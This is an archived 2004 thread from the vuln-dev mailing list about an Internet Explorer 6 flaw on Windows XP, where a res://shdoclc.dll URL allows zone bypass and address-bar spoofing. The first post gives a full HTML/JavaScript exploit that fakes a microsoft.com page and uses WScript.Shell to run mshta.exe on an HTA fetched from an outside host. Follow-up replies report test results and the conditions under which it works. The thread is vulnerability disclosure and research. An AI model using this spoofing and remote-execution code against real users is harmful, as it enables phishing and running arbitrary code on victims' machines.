Vulnerability Development: FW: Windows XP Prof and shdoclc.dll

Nmap Security Scanner

Intro

Ref Guide

Install Guide

Download

Changelog

Book

Docs
Security Lists

Bugtraq

Basics

More
Security Tools

More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

Vulnerability Development mailing list archives

FW: Windows XP Prof and shdoclc.dll - zone-pass and site spoofing

From: "V. Poddubnyy" <vpoddubniy () mail ru>
Date: Wed, 14 Jul 2004 21:45:47 +0400

Hi!

A little update: it was without changing your URL to point to the real
shdoclc.dll and under Normal user account. Under Administrator the disk was
renamed, under Normal user I don't have permission to rename disks.

So exploit works with those people who are browsing as administrators and
setup windows to the default directory AND who always press 'Yes' in
security warnings. You really need to find a way to get real %windir% for
exploit to work. Good luck!

Regards,
 Vladimir

-----Original Message-----
From: V. Poddubnyy [mailto:vpoddubniy () mail ru]
Sent: Tuesday, July 13, 2004 11:10 PM
To: 'Bartosz Kwitkowski'; vuln-dev () securityfocus com
Subject: RE: Windows XP Prof and shdoclc.dll - zone-pass and site 
spoofing

Hi!

Well, in my fully patched IE 60 (Eng) on Win XP Pro Corporate it asked 
me for permission to execute ActiveX, then (I clicked Yes) it said to 
me that access was denied in line 20 of your hta. Execution was 
performed in Internet zone...

Regards,
 Vladimir

-----Original Message-----
From: Bartosz Kwitkowski [mailto:bartosz () wb pl]
Sent: Tuesday, July 13, 2004 11:30 AM
To: vuln-dev () securityfocus com
Subject: Windows XP Prof and shdoclc.dll - zone-pass and

site spoofing




details:

OS: Windows XP Prof (fully patched), IE 6.0
LANG: Polish (of course).

VULN:

1.this is zone-by-pass. Opening IE window is in My Computer zone.
You can paste script into this page and it will be executed

as local.

I think this is very serious vuln.

2.site spoofing. You can create spoofed link. User when

clicking will

think he is going to for example microsoft.com.
It will open page with microsoft.com URL in address bar.

You can paste

your own page to this window and user won't know this page is 
spoofed.This is also very serious problem.

EXPLOIT:

<html><body>
&lt;script&gt;
klocek = window.open('res://c:\\windows\\system32
\\shdoclc.dll/http_404.htm#http://www.microsoft.com','_meia');


klocek.document.write("<html><head><title>Microsoft.com</title>");
klocek.document.write("</head><body>Site moved to <a 
href=\"http://wb.pl/bartosz\";> Bartosz Kwitkowski Home Page
"+"<"+"/a>:-) Vuln by Bartosz Kwitkowski\n"); 
klocek.document.write("<"+"script>\n");
klocek.document.write("alert(\"ATTACKING!\");\n");

klocek.document.write("var wsh=new
ActiveXObject('WScript.Shell');\n");
klocek.document.write("wsh.Run('mshta.exe
http://wb.pl/bartosz/hta/start2.hta');\n");

klocek.document.write("<"+"/script>\n");
klocek.document.write("</body></html>\n");


&lt;/script&gt;
</body></html>

----end--------

This is safe exploit so you can execute it if you want...
start2.hta contains script which changes your C: disk label to "new 
label".

PS: Sorry my English, but... :-)

Best regards,
Bartosz Kwitkowski

By Date By Thread

Current thread:

Windows XP Prof and shdoclc.dll - zone-pass and site spoofing Bartosz Kwitkowski (Jul 13)
- RE: Windows XP Prof and shdoclc.dll - zone-pass and site spoofing V. Poddubnyy (Jul 14)
- <Possible follow-ups>
- FW: Windows XP Prof and shdoclc.dll - zone-pass and site spoofing V. Poddubnyy (Jul 14)